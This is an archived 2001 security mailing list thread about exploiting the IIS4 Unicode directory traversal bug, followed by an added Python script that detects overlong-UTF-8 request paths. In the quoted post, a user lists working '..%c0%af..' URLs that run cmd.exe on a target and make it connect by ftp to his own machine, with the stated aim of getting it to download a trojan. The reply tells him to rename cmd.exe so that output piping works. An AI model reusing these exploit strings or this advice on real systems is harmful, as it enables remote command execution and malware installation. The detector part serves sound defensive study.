Vulnerability Development: Re: unicode / iis4 (fwd)

Re: unicode / iis4 (fwd)

From: Julian Linton <jlinton_at_CIS.FAMU.EDU>
Date: Sat, 6 Jan 2001 19:16:42 -0500

                                                                                                                                                                

You must first copy cmd.exe to another name such as cmd1.exe. If you use cmd.exe it will not allow piping, but simply rename it and you've got a winner.
http://www.securityfocus.com/templates/archive.pike?threads=0&end=2000-10-29&mid=141284&start=2000-10-23&list=1&fromthread=0&
gives you an example.

----- Original Message -----
From: "Mad Zigy" <zigy_at_GLOBAL.CO.ZA>
To: <VULN-DEV_at_SECURITYFOCUS.COM>
Sent: Saturday, January 06, 2001 7:59 AM
Subject: unicode / iis4

> Well, I have been able to use msadc2.pl, yet the commands I give do not work. So I tried the other way by doing
> http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test.txt
> and all it did was say: The parameter is incorrect.
> So then I thought maybe we can't have a > in the string, so I found the hex of it and tried
> http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+%3e+c:\test.txt
> yet it still gave me the same: The parameter is incorrect.
> I have been able to make it ftp into my PC by
> http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname
> but I can't make it log in, as I need to echo a script which I can run
> http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+-s:c:\ftp.txt+hostname
> so that it will log in and download the exe / trojan.
> Thankz zigy!
>
Received on Jan 08 2001
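
A defender-side check for the request pattern discussed in this thread, added here as an example and not part of the original posts. It canonicalizes the URL path and alerts on overlong UTF-8 encodings such as `%c0%af` rather than on the name `cmd.exe`, since the reply above notes the binary may be copied to another name. The sample request lines, `analyze` and `suspicious` are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed request lines for illustration (not from a real log).
SAMPLE_REQUESTS = [
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%af../winnt/system32/cmd1.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%C1%9C../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /docs/caf%c3%a9.html HTTP/1.0",
    "GET /images/logo.gif HTTP/1.0",
]
REQUEST_RE = re.compile(r"^[A-Z]+ (\S+)(?: HTTP/\d\.\d)?$")

def analyze(request_line):
    """Canonicalize the URL path and report what the raw encoding concealed."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return None
    raw = unquote_to_bytes(m.group(1).split("?", 1)[0])
    out, hidden, i = bytearray(), [], 0
    while i < len(raw):
        b = raw[i]
        # 0xC0/0xC1 lead bytes are never valid UTF-8: they can only start an
        # overlong two-byte form of an ASCII character such as '/' or '\'.
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            ch = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            hidden.append(chr(ch))
            out.append(ch)
            i += 2
        else:
            out.append(b)
            i += 1
    canonical = out.decode("utf-8", "replace")
    return {
        "canonical": canonical,
        "overlong": hidden,
        "traversal": ".." in re.split(r"[\\/]", canonical),
        "executable": canonical.lower().endswith(".exe"),
    }

def suspicious(request_line):
    """Alert on the encoding itself, not on a filename such as cmd.exe."""
    result = analyze(request_line)
    return bool(result and result["overlong"])

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(suspicious(line), analyze(line)["canonical"])
```

Legitimate multi-byte UTF-8 such as `%c3%a9` is left alone, so the rule fires only on encodings that no conforming client produces.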
